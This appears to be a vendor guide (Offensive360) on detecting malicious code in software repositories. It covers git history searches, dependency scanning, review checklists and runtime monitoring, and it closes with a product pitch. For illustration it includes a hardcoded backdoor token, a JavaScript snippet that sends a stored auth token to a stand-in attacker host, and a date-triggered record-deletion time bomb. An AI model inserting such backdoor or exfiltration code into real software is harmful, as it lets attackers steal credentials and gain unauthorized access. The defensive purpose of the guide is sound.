Malicious code in a software project doesn’t always arrive through external attackers exploiting vulnerabilities. It can be introduced by a compromised dependency, a malicious contributor, a supply chain attack on your build toolchain, or an insider threat. Once inside, it often runs with the same privileges as your legitimate application — making it extremely dangerous and hard to detect.
This guide covers the techniques used to systematically identify malicious code in source repositories.
What Malicious Source Code Looks Like
Malicious code inserted into a codebase typically falls into one of these categories:
1. Backdoors
Hidden functionality that allows unauthorized access, often disguised as legitimate feature code:
# Disguised as "debug mode" but activates on a specific token
def authenticate(user, password, debug_token=None):
if debug_token == "4x7k-internal-2024": # ← Hardcoded backdoor
return True
return check_password(user, password)
2. Data Exfiltration
Code that silently sends sensitive data to an external endpoint:
// Hidden in a legitimate-looking analytics helper
function trackPageView(page) {
// Legitimate tracking...
fetch('https://analytics.example.com/track', { body: JSON.stringify({ page }) });
// Malicious: also exfiltrates auth tokens
const token = localStorage.getItem('auth_token');
if (token) {
fetch('https://attacker-controlled.net/collect', {
method: 'POST',
body: token
});
}
}
3. Cryptominers
CPU-intensive code embedded to mine cryptocurrency using your users’ or servers’ resources:
// Often obfuscated or loaded from an external script tag
const _0x4f2a = ['WebAssembly', 'instantiateStreaming'];
// ... heavily obfuscated miner code
4. Supply Chain Injections
Malicious code injected into a third-party package that your project depends on. The SolarWinds breach and the event-stream npm package incident are canonical examples.
5. Time-Bombed or Trigger-Based Code
// Only executes on a specific date or condition
public void process(Request req) {
Calendar c = Calendar.getInstance();
if (c.get(Calendar.MONTH) == 11 && c.get(Calendar.DAY_OF_MONTH) == 31) {
// Destructive payload executed on Dec 31
deleteAllRecords();
return;
}
normalProcess(req);
}
Detection Method 1: Static Analysis (SAST) with Malware Signatures
A SAST tool with malware detection capability scans source code for known malicious patterns:
- Hardcoded IP addresses or domains in non-configuration files
- Encoded/obfuscated strings (
base64, hex encoding, eval of dynamic strings) - Unusual network calls to non-whitelisted domains
- Deletion or encryption of files outside expected scope
- Access to sensitive system files (
/etc/passwd, registry keys) - Cryptocurrency mining APIs or WebAssembly blobs
Offensive360’s SAST engine includes dedicated malware pattern analysis that scans for these indicators across all supported languages.
Detection Method 2: Git History Analysis
Malicious code often enters through a specific commit. Audit your git history for:
# Find commits that added external URLs or IPs
git log -p --all | grep -E "(http[s]?://|[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})"
# Find commits that added base64-looking strings
git log -p --all | grep -E "[A-Za-z0-9+/]{40,}={0,2}"
# Commits from unexpected contributors
git log --all --format='%H %ae %s' | sort -k2
# Large binary blobs added to the repo
git log --all --diff-filter=A -- "*.bin" "*.wasm" "*.dll"
Red flags in git history:
- A commit that modifies an unrelated file alongside legitimate changes
- A contributor account that was recently created or has no prior activity
- A commit at an unusual time (3am in a different timezone)
- A commit that modifies build scripts, CI configuration, or package lock files
Detection Method 3: Dependency Scanning (SCA)
Most supply chain attacks come through dependencies, not direct code changes. Scan every dependency for known malicious packages:
# npm
npm audit
npx is-website-vulnerable
# Python
pip-audit
# Ruby
bundle audit
# .NET
dotnet list package --vulnerable
Beyond known CVEs — look for:
- Packages with very new versions that suddenly modify network behavior
- Packages where the maintainer account changed hands recently
- Typosquatting:
lodashvs1odash,expressvsexpres - Packages with install scripts (
preinstall,postinstall) that make network calls
Detection Method 4: Code Review Checklists
When reviewing code (especially from external contributors or after a dependency update), look for:
Network activity:
- Are all outbound network calls to known, approved endpoints?
- Is there any fetch/HTTP call that doesn’t have a corresponding feature requirement?
- Are URLs or IPs hardcoded instead of loaded from configuration?
Obfuscation:
- Is there any
eval(),exec(),os.system(), or dynamic code execution? - Are there long base64-encoded strings not related to legitimate assets?
- Is there code that decodes and executes a string at runtime?
Data access:
- Does this code access environment variables, tokens, or secrets?
- Is it reading files outside the expected application scope?
- Does it access the clipboard, cookies, or local storage for no stated reason?
Conditional execution:
- Is there any logic that only triggers on specific dates, system states, or input values?
- Are there commented-out blocks with suspicious-looking code?
Detection Method 5: Runtime Monitoring
Even with thorough static analysis, some malicious code only activates at runtime. Supplement static detection with:
- Outbound network monitoring: Alert on any process making network calls to domains not on a whitelist
- File system auditing: Monitor for reads of
/etc/shadow,~/.ssh/id_rsa, credential files - Process monitoring: Alert on unexpected child processes spawned by your application
- Memory scanning: Detect in-memory code injection or shellcode execution
Tools: Falco (Kubernetes), auditd (Linux), Windows Defender ATP, eBPF-based monitoring.
High-Risk Entry Points to Monitor
| Entry Point | Risk | Mitigation |
|---|---|---|
| Open-source dependencies | Supply chain injection | SCA scanning + lockfile pinning |
| CI/CD pipeline actions | Malicious GitHub Actions | Pin action versions to commit hash |
| Docker base images | Trojaned images | Use verified official images + scan |
| External contributors | Direct code injection | Mandatory code review + SAST gate |
| Build toolchain | Compiler/toolchain compromise | Verify checksums, use reproducible builds |
| Package registries | Typosquatting, account takeover | Dependency pinning, audit new versions |
Indicators of Compromise in Source Code
Look for these specific patterns regardless of language:
# Suspicious patterns to search for
grep -rn "eval\|exec\|system\|shell_exec\|base64_decode" src/
grep -rn "http[s]\?://[0-9]\+\.[0-9]\+\.[0-9]\+\.[0-9]\+" src/ # IP-based URLs
grep -rn "atob\|btoa\|fromCharCode" src/
grep -rn "process.env\." src/ | grep -v ".config\." | grep -v "test"
Building a Malicious Code Detection Pipeline
For ongoing protection, integrate detection into your development lifecycle:
- Pre-commit hooks — Git hooks to block obvious malicious patterns (hardcoded secrets, suspicious evals) before commit
- CI/CD SAST gate — Full static analysis + malware scan on every PR
- Dependency update monitoring — Automated SCA on every dependency change
- Periodic full-repo scans — Weekly SAST scan of the entire codebase, not just diffs
- Incident response plan — Defined process for when malicious code is detected
Offensive360 SAST includes dedicated malware and backdoor detection alongside standard vulnerability scanning. Scan your codebase now or book a demo to see the malware analysis engine in action.